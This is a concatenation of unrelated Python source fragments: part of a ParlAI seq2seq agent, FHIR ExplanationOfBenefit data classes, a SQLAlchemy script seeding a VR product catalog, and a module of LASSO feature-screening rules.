help='default 1, if greater then uses mixture of '
'softmax (see arxiv.org/abs/1711.03953).')
agent.add_argument('--beam-size', type=int, default=1,
help='Beam size, if 1 then greedy search')
agent.add_argument('--beam-dot-log', type='bool', default=False,
help='Dump beam trees as png dot images into /tmp folder')
agent.add_argument('--beam-min-n-best', type=int, default=3,
help='Minimum number of nbest candidates to achieve '
'during the beam search')
agent.add_argument('--beam-min-length', type=int, default=3,
help='Minimum length of prediction to be generated by '
'the beam search')
agent.add_argument('-idr', '--input-dropout', type=float, default=0.0,
help='Each token from the input will be masked with'
' __unk__ token with this probability.')
agent.add_argument('--beam-block-ngram', type=int, default=0,
help='Block all repeating ngrams up to history length n-1')
TorchAgent.add_cmdline_args(argparser)
Seq2seqAgent.dictionary_class().add_cmdline_args(argparser)
return agent
@staticmethod
def model_version():
"""Return current version of this model, counting up from 0.
Models may not be backwards-compatible with older versions.
Version 1 split from version 0 on Aug 29, 2018.
To use version 0, use --model legacy:seq2seq:0
(legacy agent code is located in parlai/agents/legacy_agents).
"""
return 1
def __init__(self, opt, shared=None):
"""Set up model."""
init_model = None
if not shared: # only do this on first setup
# first check load path in case we need to override paths
if opt.get('init_model') and os.path.isfile(opt['init_model']):
# check first for 'init_model' for loading model from file
init_model = opt['init_model']
if opt.get('model_file') and os.path.isfile(opt['model_file']):
# next check for 'model_file', this would override init_model
init_model = opt['model_file']
if init_model is not None:
# if we are loading a model, should load its dict too
if (os.path.isfile(init_model + '.dict') or
opt['dict_file'] is None):
opt['dict_file'] = init_model + '.dict'
super().__init__(opt, shared)
opt = self.opt
# all instances may need some params
self.id = 'Seq2Seq'
self.multigpu = (opt.get('multigpu') and self.use_cuda and
(opt.get('batchsize') > 1))
states = {}
self.beam_dot_log = opt.get('beam_dot_log', False)
self.beam_size = opt.get('beam_size', 1)
self.beam_min_n_best = opt.get('beam_min_n_best', 3)
self.beam_min_length = opt.get('beam_min_length', 3)
self.beam_block_ngram = opt.get('beam_block_ngram', 0)
if shared:
# set up shared properties
self.model = shared['model']
self.metrics = shared['metrics']
states = shared.get('states', {})
else:
self.metrics = {'loss': 0.0, 'num_tokens': 0, 'correct_tokens': 0,
'total_skipped_batches': 0}
# this is not a shared instance of this class, so do full init
if self.beam_dot_log:
self.beam_dot_dir = tempfile.mkdtemp(
prefix='{}-beamdot-beamsize-{}-'.format(
os.path.basename(
opt.get('model_file')),
self.beam_size))
print(
'[ Saving dot beam logs in {} ]'.format(
self.beam_dot_dir))
if init_model is not None:
# load model parameters if available
print('[ Loading existing model params from {} ]'
''.format(init_model))
states = self.load(init_model)
self._init_model(states=states)
# set up criteria
if opt.get('numsoftmax', 1) > 1:
self.criterion = nn.NLLLoss(
ignore_index=self.NULL_IDX, size_average=False)
else:
self.criterion = nn.CrossEntropyLoss(
ignore_index=self.NULL_IDX, size_average=False)
if self.use_cuda:
self.criterion.cuda()
if 'train' in opt.get('datatype', ''):
self.init_optim(
[p for p in self.model.parameters() if p.requires_grad],
optim_states=states.get('optimizer'),
saved_optim_type=states.get('optimizer_type'))
self.reset()
def _init_model(self, states=None):
"""Initialize model, override to change model setup."""
opt = self.opt
kwargs = opt_to_kwargs(opt)
self.model = Seq2seq(
len(self.dict), opt['embeddingsize'], opt['hiddensize'],
padding_idx=self.NULL_IDX, start_idx=self.START_IDX,
unknown_idx=self.dict[self.dict.unk_token],
longest_label=states.get('longest_label', 1),
**kwargs)
if (opt.get('dict_tokenizer') == 'bpe' and
opt['embedding_type'] != 'random'):
print('skipping preinitialization of embeddings for bpe')
elif not states and opt['embedding_type'] != 'random':
# `not states`: only set up embeddings if not loading model
self._copy_embeddings(self.model.decoder.lt.weight,
opt['embedding_type'])
if opt['lookuptable'] in ['unique', 'dec_out']:
# also set encoder lt, since it's not shared
self._copy_embeddings(self.model.encoder.lt.weight,
opt['embedding_type'], log=False)
if states:
# set loaded states if applicable
self.model.load_state_dict(states['model'])
if opt['embedding_type'].endswith('fixed'):
print('Seq2seq: fixing embedding weights.')
self.model.decoder.lt.weight.requires_grad = False
self.model.encoder.lt.weight.requires_grad = False
if opt['lookuptable'] in ['dec_out', 'all']:
self.model.decoder.e2s.weight.requires_grad = False
if self.use_cuda:
self.model.cuda()
if self.multigpu:
self.model = torch.nn.DataParallel(self.model)
self.model.encoder = self.model.module.encoder
self.model.decoder = self.model.module.decoder
self.model.longest_label = self.model.module.longest_label
self.model.output = self.model.module.output
return self.model
def _v2t(self, vec):
"""Convert token indices to string of tokens."""
new_vec = []
if hasattr(vec, 'cpu'):
vec = vec.cpu()
for i in vec:
if i == self.END_IDX:
break
elif i != self.START_IDX:
new_vec.append(i)
return self.dict.vec2txt(new_vec)
def zero_grad(self):
"""Zero out optimizer."""
self.optimizer.zero_grad()
def update_params(self):
"""Do one optimization step."""
if self.clip > 0:
torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.clip)
self.optimizer.step()
def reset_metrics(self):
"""Reset metrics for reporting loss and perplexity."""
super().reset_metrics()
self.metrics['loss'] = 0.0
self.metrics['num_tokens'] = 0
self.metrics['correct_tokens'] = 0
def report(self):
"""Report loss and perplexity from model's perspective.
Note that this includes predicting __END__ and __UNK__ tokens and may
differ from a truly independent measurement.
"""
m = {}
num_tok = self.metrics['num_tokens']
if num_tok > 0:
if self.metrics['correct_tokens'] > 0:
m['token_acc'] = self.metrics['correct_tokens'] / num_tok
m['loss'] = self.metrics['loss'] / num_tok
try:
m['ppl'] = math.exp(m['loss'])
except OverflowError:
m['ppl'] = float('inf')
if self.metrics['total_skipped_batches'] > 0:
m['total_skipped_batches'] = self.metrics['total_skipped_batches']
for k, v in m.items():
# clean up: rounds to sigfigs and converts tensors to floats
m[k] = round_sigfigs(v, 4)
return m
def share(self):
"""Share internal states between parent and child instances."""
shared = super().share()
shared['model'] = self.model
if self.opt.get('numthreads', 1) > 1:
# we're doing hogwild so share the model too
if isinstance(self.metrics, dict):
# move metrics and model to shared memory
self.metrics = SharedTable(self.metrics)
self.model.share_memory()
shared['states'] = { # don't share optimizer states
'optimizer_type': self.opt['optimizer'],
}
shared['metrics'] = self.metrics # do after numthreads check
if self.beam_dot_log is True:
shared['beam_dot_dir'] = self.beam_dot_dir
return shared
def vectorize(self, *args, **kwargs):
"""Override vectorize for seq2seq."""
kwargs['add_start'] = False # model does this in module code
kwargs['add_end'] = True # we do want this
return super().vectorize(*args, **kwargs)
def batchify(self, *args, **kwargs):
"""Override batchify options for seq2seq."""
kwargs['sort'] = True # need sorted for pack_padded
return super().batchify(*args, **kwargs)
def _init_cuda_buffer(self, model, criterion, batchsize, maxlen):
"""Pre-initialize CUDA buffer by doing fake forward pass."""
if self.use_cuda and not hasattr(self, 'buffer_initialized'):
try:
print('preinitializing pytorch cuda buffer')
dummy = torch.ones(batchsize, maxlen).long().cuda()
out = model(dummy, dummy)
sc = out[0] # scores
loss = criterion(sc.view(-1, sc.size(-1)), dummy.view(-1))
loss.backward()
self.buffer_initialized = True
except RuntimeError as e:
if 'out of | |
"""
self.unit = None
""" Individual or family.
Type `CodeableConcept` (represented as `dict` in JSON). """
super(ExplanationOfBenefitBenefitBalance, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ExplanationOfBenefitBenefitBalance, self).elementProperties()
js.extend([
("category", "category", codeableconcept.CodeableConcept, False, None, True),
("description", "description", str, False, None, False),
("excluded", "excluded", bool, False, None, False),
("financial", "financial", ExplanationOfBenefitBenefitBalanceFinancial, True, None, False),
("name", "name", str, False, None, False),
("network", "network", codeableconcept.CodeableConcept, False, None, False),
("term", "term", codeableconcept.CodeableConcept, False, None, False),
("unit", "unit", codeableconcept.CodeableConcept, False, None, False),
])
return js
class ExplanationOfBenefitBenefitBalanceFinancial(backboneelement.BackboneElement):
""" Benefit Summary.
Benefits Used to date.
"""
resource_type = "ExplanationOfBenefitBenefitBalanceFinancial"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.allowedMoney = None
""" Benefits allowed.
Type `Money` (represented as `dict` in JSON). """
self.allowedString = None
""" Benefits allowed.
Type `str`. """
self.allowedUnsignedInt = None
""" Benefits allowed.
Type `int`. """
self.type = None
""" Benefit classification.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.usedMoney = None
""" Benefits used.
Type `Money` (represented as `dict` in JSON). """
self.usedUnsignedInt = None
""" Benefits used.
Type `int`. """
super(ExplanationOfBenefitBenefitBalanceFinancial, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ExplanationOfBenefitBenefitBalanceFinancial, self).elementProperties()
js.extend([
("allowedMoney", "allowedMoney", money.Money, False, "allowed", False),
("allowedString", "allowedString", str, False, "allowed", False),
("allowedUnsignedInt", "allowedUnsignedInt", int, False, "allowed", False),
("type", "type", codeableconcept.CodeableConcept, False, None, True),
("usedMoney", "usedMoney", money.Money, False, "used", False),
("usedUnsignedInt", "usedUnsignedInt", int, False, "used", False),
])
return js
class ExplanationOfBenefitCareTeam(backboneelement.BackboneElement):
""" Care Team members.
The members of the team who provided the products and services.
"""
resource_type = "ExplanationOfBenefitCareTeam"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.provider = None
""" Practitioner or organization.
Type `FHIRReference` (represented as `dict` in JSON). """
self.qualification = None
""" Practitioner credential or specialization.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.responsible = None
""" Indicator of the lead practitioner.
Type `bool`. """
self.role = None
""" Function within the team.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.sequence = None
""" Order of care team.
Type `int`. """
super(ExplanationOfBenefitCareTeam, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ExplanationOfBenefitCareTeam, self).elementProperties()
js.extend([
("provider", "provider", fhirreference.FHIRReference, False, None, True),
("qualification", "qualification", codeableconcept.CodeableConcept, False, None, False),
("responsible", "responsible", bool, False, None, False),
("role", "role", codeableconcept.CodeableConcept, False, None, False),
("sequence", "sequence", int, False, None, True),
])
return js
class ExplanationOfBenefitDiagnosis(backboneelement.BackboneElement):
""" Pertinent diagnosis information.
Information about diagnoses relevant to the claim items.
"""
resource_type = "ExplanationOfBenefitDiagnosis"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.diagnosisCodeableConcept = None
""" Nature of illness or problem.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.diagnosisReference = None
""" Nature of illness or problem.
Type `FHIRReference` (represented as `dict` in JSON). """
self.onAdmission = None
""" Present on admission.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.packageCode = None
""" Package billing code.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.sequence = None
""" Diagnosis instance identifier.
Type `int`. """
self.type = None
""" Timing or nature of the diagnosis.
List of `CodeableConcept` items (represented as `dict` in JSON). """
super(ExplanationOfBenefitDiagnosis, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ExplanationOfBenefitDiagnosis, self).elementProperties()
js.extend([
("diagnosisCodeableConcept", "diagnosisCodeableConcept", codeableconcept.CodeableConcept, False, "diagnosis", True),
("diagnosisReference", "diagnosisReference", fhirreference.FHIRReference, False, "diagnosis", True),
("onAdmission", "onAdmission", codeableconcept.CodeableConcept, False, None, False),
("packageCode", "packageCode", codeableconcept.CodeableConcept, False, None, False),
("sequence", "sequence", int, False, None, True),
("type", "type", codeableconcept.CodeableConcept, True, None, False),
])
return js
class ExplanationOfBenefitInsurance(backboneelement.BackboneElement):
""" Patient insurance information.
Financial instruments for reimbursement for the health care products and
services specified on the claim.
"""
resource_type = "ExplanationOfBenefitInsurance"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.coverage = None
""" Insurance information.
Type `FHIRReference` (represented as `dict` in JSON). """
self.focal = None
""" Coverage to be used for adjudication.
Type `bool`. """
self.preAuthRef = None
""" Prior authorization reference number.
List of `str` items. """
super(ExplanationOfBenefitInsurance, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(ExplanationOfBenefitInsurance, self).elementProperties()
js.extend([
("coverage", "coverage", fhirreference.FHIRReference, False, None, True),
("focal", "focal", bool, False, None, True),
("preAuthRef", "preAuthRef", str, True, None, False),
])
return js
class ExplanationOfBenefitItem(backboneelement.BackboneElement):
""" Product or service provided.
A claim line. Either a simple (a product or service) or a 'group' of
details which can also be a simple items or groups of sub-details.
"""
resource_type = "ExplanationOfBenefitItem"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.adjudication = None
""" Adjudication details.
List of `ExplanationOfBenefitItemAdjudication` items (represented as `dict` in JSON). """
self.bodySite = None
""" Anatomical location.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.careTeamSequence = None
""" Applicable care team members.
List of `int` items. """
self.category = None
""" Benefit classification.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.detail = None
""" Additional items.
List of `ExplanationOfBenefitItemDetail` items (represented as `dict` in JSON). """
self.diagnosisSequence = None
""" Applicable diagnoses.
List of `int` items. """
self.encounter = None
""" Encounters related to this billed item.
List of `FHIRReference` items (represented as `dict` in JSON). """
self.factor = None
""" Price scaling factor.
Type `float`. """
self.informationSequence = None
""" Applicable exception and supporting information.
List of `int` items. """
self.locationAddress = None
""" Place of service or where product was supplied.
Type `Address` (represented as `dict` in JSON). """
self.locationCodeableConcept = None
""" Place of service or where product was supplied.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.locationReference = None
""" Place of service or where product was supplied.
Type `FHIRReference` (represented as `dict` in JSON). """
self.modifier = None
""" Product or service billing modifiers.
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.net = None
""" Total item cost.
Type `Money` (represented as `dict` in JSON). """
self.noteNumber = None
""" Applicable note numbers.
List of `int` items. """
self.procedureSequence = None
""" Applicable procedures.
List of `int` items. """
self.productOrService = None
""" Billing, service, product, or drug code.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.programCode = None
""" Program the product or service is provided under.
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.quantity = None
""" Count of products or services.
Type `Quantity` (represented as `dict` in JSON). """
self.revenue = None
""" Revenue or cost center code.
Type `CodeableConcept` (represented as `dict` in JSON). """
self.sequence = None
""" Item instance identifier.
Type `int`. """
self.servicedDate = None
""" Date or dates of service or product delivery.
Type `FHIRDate` (represented as `str` in JSON). """
self.servicedPeriod = None
""" Date or dates of service or product delivery.
Type `Period` (represented as | |
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from models import *
engine = create_engine('postgresql://catalog:catalog@localhost:5432/catalog')
base.Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
# Create a first user for entering items
user = user.User(name="Chris", email="<EMAIL>")
session.add(user)
session.commit()
# Create a first store to associate products with
store = store.Store(name="Virtual Reality Store", user_id=1)
session.add(store)
session.commit()
# Create items to populate the product list
# Item information compiled from Amazon.com and Steampowered.com
item = product.Product(name="Samsung Gear VR",
category="Hardware",
description="""Light weight so you can play and watch more
comfortably. Easy to use touch pad wide field of view, precise
head-tracking and low latency brings reality to the virtual. Be
transported to amazing new worlds, in games, video and images.
Thousands of 360 degree panoramic photos. Compatible with:
Samsung Galaxy S7, S7 edge,Note5,S6 edge+,S6,S6 edge. Improved
fit, including room for most eyeglasses and improved padding for
extra comfort and durability.""",
price="$59.99",
store_id=1,
user_id=1)
session.add(item)
session.commit()
item2 = product.Product(name="Plustore 3D Virtual Reality Glasses",
category="Hardware",
description="""Revolutionary optical system - it completely
eliminates the feel of vertigo. Fit everyone's eyes: Pupil
settings for the best 3D experience, even to those near-sighted.
Innovative design comfortable wearable - Adjustable straps for
flexible wear, Super Lighter Weight of 156g. Turn your
smartphone into a virtual reality viewer. Enjoy real 360-degree
videos and immersive world of VR from the comfort of your home.
Adaptable - adaptable for adroid and ios smart phones with the
screen size being "4.7-6" inches and pixels over 1280*720.""",
price="$16.88",
store_id=1,
user_id=1)
session.add(item2)
session.commit()
item3 = product.Product(name="SARLAR 3D VR Glasses",
category="Hardware",
description="""TAKE CARE OF YOUR EYES AND PUT ZERO
PRESSURE-Lower eyelid is the weakest part of the eyes. It's
based on human engineering, redesign the position on basis of
regurlar headband to re lieve the load of nose bridge and eyelid
so as to allevate feeling of fatigue. OVERSIZED VISUAL ANGLE
GETS YOU IMMERSIVE-FOV102 panoramic view and the screen is
magnified 5.2 times than before,the super vision will give you
unlimited world, an incredible visual fidelity and immersive
feeling. NO ADJUSTMENTS ARE NEEDED FOR THE MIDDLE LINE OF DOUBLE
SCREENS-The supporting structure for mobile phones in the left
and right together with gear adjustment can perfectly immobilize
the phone.Also,it supports phones with larger size.There is no
need to adjust the position of moble phones after the first
adjustment.The middle line adjustment is so simple!The design is
just humanized and awesome. ASPHERIC LENS DESIGN,FRAMES WILL BE
MORE COMFORTABLE-Aspheric lens design,the frame has no
abnormalities and perfectly fit for the visual habits,no
spinning sensation will generate when wearing.High adjustment no
ghosting. COMPATIBLE WITH ALMOST ALL MOBILE PHONES-Sarlar vr
glasses is with small size but it supports large size phones
will various brands and types,compatibles with almost all mobile
phones.It is suitable for any smart phone which screen size is
from 4.0-6.5",more than that you cannot call it mobile phone,it
is compatible with mobile phones which length doesn't exceed
175mm and width doesn't exceed90mm.""",
price="$19.99",
store_id=1,
user_id=1)
session.add(item3)
session.commit()
item4 = product.Product(name="Cellay 3D VR Goggles",
category="Hardware",
description="""Glasses-free: Without wearing the glasses if your
visual acuity is under 600 degree. IMAX Effect: Anti-distortion
aspheric design, lowering down the distortion and enjoying 3D
IMAX world. Adjustable Distance:VR virtual reality headset is
able to adjust focal length and pupil distance according to
different people. T-shaped Strap: It helps you reduce the
pressure around your eyes and almost suitable for everyone.
Compatible with: VR helmet fit for smartphone just as Apple and
Android phone and screen between 4.0~6.5 inches.""",
price="$33.45",
store_id=1,
user_id=1)
session.add(item4)
session.commit()
item5 = product.Product(name="Google Cardboard",
category="Hardware",
description="""GOOGLE CARDBOARD is the primary experience
version of 3D VR Glasses. It's made from the AAA grade
corrugated paper which is the strongest material. Our product.Product is
the highest quality for this price in the market. HAVING
ADVANCED GOOGLE CARDBOARD according to the advice from customers
and tested it over 80 times. We add the longer head strap,
suction cups and forehead pad. So far, we have sold more than
500,000 sets. COMPATIBLE FOR all the 3.5"- 6.0" smartphones.
Whether your phone system is Android system or other systems,
you can use the TOPMAXION Cardboard to watch Left-right 3D
movies on Video Player and play varieties of VR games. IN ORDER
TO EXPERIENCE HIGH QUALITY 3D FEELING, you'd better use high
resolusion smartphones. Experience a truly stunning, engrossing
VR experience with cinematic HD visuals from your smart phone's
screen using the included biconvex lenses offering a 37 mm focal
length for the best visuals! THE PERFECT SOLUTION for Virtual
Reality on a budget!Box-style package with good portability,
easily take anywhere.""",
price="$9.99",
store_id=1,
user_id=1)
session.add(item5)
session.commit()
item = product.Product(name="Oculus Rift",
category="Hardware",
description="""Oculus Rift's advanced display technology
combined with its precise, low-latency constellation tracking
system enables the sensation of presence. Customizable,
comfortable, adaptable, and beautiful, Rift is technology and
design as remarkable as the experiences it enables. Every aspect
of Rift was designed to be easy, inviting, and comfortable to
use - and that extends to the VR environment we've created as a
starting point for your journeys. Discover and download games
across genres ranging from action RPGs, sci-fi shooters,
mind-bending puzzle games, and more - and play them from an
entirely new perspective. Lucky's Tale is included with every
Rift purchase. Windows PC and an internet connection are
required for Oculus Rift - please review recommended system
specs.""",
price="$599.00",
store_id=1,
user_id=1)
session.add(item)
session.commit()
item = product.Product(name="HTC Vive",
category="Hardware",
description="""Vive is built from the ground up for room-scale
VR, which allows you to physically move around objects in the
virtual space. With more than 500 games and growing for SteamVR,
everything you love about Steam is now available in VR. The
Gallery: Call of the Starseed, Tilt Brush and Zombie Training
Simulator come with Vive for free. An adjustable headset and
multiple eye relief adjustments, including lens distance and
IPD, to make Vive comfortable and clear. Wireless controllers
designed specifically for VR make interactions with objects
natural and intuitive. Enjoy a safe, convenient experience with
Chaperone bounds of your play area, a front-facing camera to
view the real world and notifications from your phone in VR.
Compatible Windows computer and internet connection
required-refer to the recommended computer specs below.""",
price="$799.99",
store_id=1,
user_id=1)
session.add(item)
session.commit()
item = product.Product(name="Virtual Reality Insider: Guidebook for the VR Industry",
category="Reference",
description="""Virtual reality is as explosive a technology as
the Internet! Are you working in the VR industry, or curious to
find out more about it? VR Insider is an overview and guidebook
for consumer virtual reality. For the industry veteran, it is
the perfect book to stir up new ideas and see how the big
picture fits together. For newcomers to VR, it is the fastest
way to catch up on what is happening and figure out how to apply
your skills. Affordable virtual reality hardware finally exists,
and this book will help you create its content! Best of all,
this book is readable in 1-2 hours!""",
price="$8.99",
store_id=1,
user_id=1)
session.add(item)
session.commit()
item = product.Product(name="""Learning Virtual Reality: Developing Immersive
Experiences and Applications for Desktop, Web, and Mobile""",
category="Reference",
description="""As virtual reality approaches mainstream consumer
use, a vibrant development ecosystem has emerged in the past few
years. This hands-on guide takes you through VR development
essentials for desktop, mobile, and browser-based applications.
You'll explore the three go-to platforms-OculusVR, Gear VR, and
Cardboard VR-as well as several VR development environments,
programming tools, and techniques. If you're an experienced
programmer familiar with mobile development, this book will help
you gain a working knowledge of VR development through clear and
simple examples. Once you create a complete application in the
final chapter, you'll have a jumpstart on the next major
entertainment medium.""",
price="$26.01",
store_id=1,
user_id=1)
session.add(item)
session.commit()
item = product.Product(name="The VR Book: Human-Centered Design for Virtual Reality",
category="Reference",
description="""Without a clear understanding of the human side
of virtual reality (VR), the experience will always fail. The VR
Book bridges this gap by focusing on human-centered design.
Creating compelling VR applications is an incredibly complex
challenge. When done well, these experiences can | |
<filename>adascreen/screening_rules.py
import numpy as np
class AbstractScreeningRule(object):
""" Base class for LASSO screening rules. """
tol = 1e-9 # tolerance
name = 'None' # name of associated lasso screening rule
isComplete = True # does NOT screen out possibly non-zero coefficients
def __init__(self, name, complete=True, tol=1e-9):
self.tol = tol
self.name = name
self.isComplete = complete
def isComplete(self):
return self.isComplete
def isFirstIter(self, l0, lmax):
return abs(l0-lmax) < self.tol
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
# returns indices of non-screened features and (updated) intervals
pass
def get_local_halfspaces(self, o, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
raise NotImplementedError('Lasso Screening Rule {0} has no local halfspace constraints.'.format(self.name))
def get_global_halfspaces(self, lmax, lmax_x, X, y, normX, normy):
raise NotImplementedError('Lasso Screening Rule {0} has no global halfspace constraints.'.format(self.name))
def init(self, lmax, lmax_x, X, y, normX, normy, path):
# in case for cache etc..
print('Screening ({0}): nothing to initialize.'.format(self.name))
def release(self):
# in case for cache etc..
print('Screening ({0}): nothing to release.'.format(self.name))
def __str__(self):
return '{0}'.format(self.name)
def __name__(self):
return '{0}'.format(self.name)
class AbstractSphereScreeningRule(AbstractScreeningRule):
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
(o, r) = self.get_sphere(l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals)
inds = np.where(np.abs(X.dot(o)) >= 1.0 - normX*r - self.tol)[0]
return (inds, intervals)
def get_sphere(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
raise NotImplementedError('Lasso Screening Rule {0} is not a sphere constraints.'.format(self.name))
class ScreenDummy(AbstractScreeningRule):
""" No screening at all. """
inds = None
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'None', tol=tol)
def init(self, lmax, lmax_x, X, y, normX, normy, path):
self.inds = np.array(range(X.shape[0]))
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
return (self.inds, intervals)
class SAFE(AbstractSphereScreeningRule):
""" <NAME>i et al. (2010) """
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'SAFE', tol=tol)
#def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
# lhs = np.abs(X.dot(y))
# rhs = l - normX * normy * (lmax - l)/lmax
# inds = np.where(lhs >= rhs - self.tol)[0]
# return (inds, intervals)
def get_sphere(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
o = y/lmax
rho = (1.0/l - 1.0/lmax)*normy
return (o, rho)
class SeqSAFE(AbstractScreeningRule):
""" <NAME> et al. (2010) """
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'SeqSAFE', tol=tol)
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
theta0 = (y - X[nz,:].T.dot(beta[nz]))
a0 = theta0.T.dot(theta0)
b0 = np.abs(y.T.dot(theta0))
D = a0*np.max( (b0/a0 - l/l0), 0.0)**2.0 + y.T.dot(y) - (b0*b0)/a0
rhs = np.abs(X.dot(y)) + np.sqrt(D)*normX
inds = np.where(l < rhs - self.tol)[0]
return (inds, intervals)
class DPP(AbstractSphereScreeningRule):
""" Screening by Dual Polytope Projection """
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'DPP', tol=tol)
#def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
# # Original [d]ual [p]olytope [p]rojection
# # get the former dual solution
# theta = (y - X[nz,:].T.dot(beta[nz])) / l0
# # screen
# lhs = np.abs(X.dot(theta))
# mul = np.abs(1.0/l - 1.0/l0) * normy
# rhs = 1.0 - normX * mul
# inds = np.where(lhs >= rhs - self.tol)[0]
# return (inds, intervals)
def get_sphere(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
# get the former dual solution
o = (y - X[nz,:].T.dot(beta[nz])) / l0
rho = np.abs(1.0/l - 1.0/l0) * normy
return (o, rho)
class StrongRule(AbstractSphereScreeningRule):
""" Tibshirani et al. (2012): Strong Rules for Discarding Predictors in Lasso-type Problems """
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'Strong', complete=False, tol=tol)
#def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
# theta = (y - X[nz,:].T.dot(beta[nz])) / l0
# lhs = np.abs(X.dot(theta))
# rhs = 2.0*l/l0 - 1.0
# inds = np.where(lhs >= rhs - self.tol)[0]
# return (inds, intervals)
def get_sphere(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
theta = (y - X[nz,:].T.dot(beta[nz])) / l0
rho = 2.0 * (1.0 - l/l0)
#print l/l0
return (theta, rho)
class DOME(AbstractScreeningRule):
""" Screening by DOME rule.
Xiang and Ramadge (2012)
One-shot method
"""
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'DOME', tol=tol)
print('Warning! Dome-screening is *not* optimized.')
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
inds = []
for i in range(X.shape[0]):
t = X[i,:].dot(lmax_x)
val = X[i,:].dot(y)
r = np.sqrt(np.maximum(1.0/(lmax*lmax) - 1.0, 0.0)) * (lmax/l - 1.0)
ql = self.__Ql(t, l, lmax, r)
qu = self.__Qu(t, l, lmax, r)
if ql>=val-self.tol or val>=qu-self.tol:
inds.append(i)
return (inds, intervals)
def __Ql(self, t, l, lmax, r):
if t<=lmax:
if 1.0-t*t<0.0:
#print 1.0-t*t
return (lmax-l)*t - l
return (lmax-l)*t - l + l*r*np.sqrt(1.0-t*t)
return -(l-1.0 + l/lmax)
def __Qu(self, t, l, lmax, r):
if t<-lmax:
return (l-1.0 + l/lmax)
if 1.0-t*t<0.0:
#print 1.0-t*t
return (lmax-l)*t + l
return (lmax-l)*t + l - l*r*np.sqrt(1.0-t*t)
def get_sphere(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
#q = y/l - (lmax/l - 1.0)*lmax_x
#r = np.sqrt(1.0/(lmax*lmax) - 1.0) * (lmax/l - 1.0)
q = y/lmax
r = normy*(1.0/l - 1.0/lmax)
# include normy in the sqrt? (like in the ST3 rule) ??
return (q, r)
def get_local_halfspaces(self, o, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
n0 = lmax_x
norm_n0 = np.linalg.norm(n0)
c0 = np.array([1.0])
n0 = n0.reshape(1, len(y))
return (n0, c0, norm_n0)
def get_global_halfspaces(self, lmax, lmax_x, X, y, normX, normy):
n0 = lmax_x
norm_n0 = np.linalg.norm(n0)
c0 = np.array([1.0])
n0 = n0.reshape(1, len(y))
return (n0, c0, norm_n0)
class ST3(DOME):
""" Screening by ST3 rule.
"""
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'ST3', tol=tol)
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
raise NotImplementedError('ST3 standalone screening not implemented.')
def get_sphere(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
theta_max = y/lmax
o = theta_max - (lmax/l - 1.0)*lmax_x
rho = np.sqrt((normy*normy)/(lmax*lmax) - 1.0) * (lmax/l - 1.0)
return (o, rho)
class HSConstr(AbstractScreeningRule):
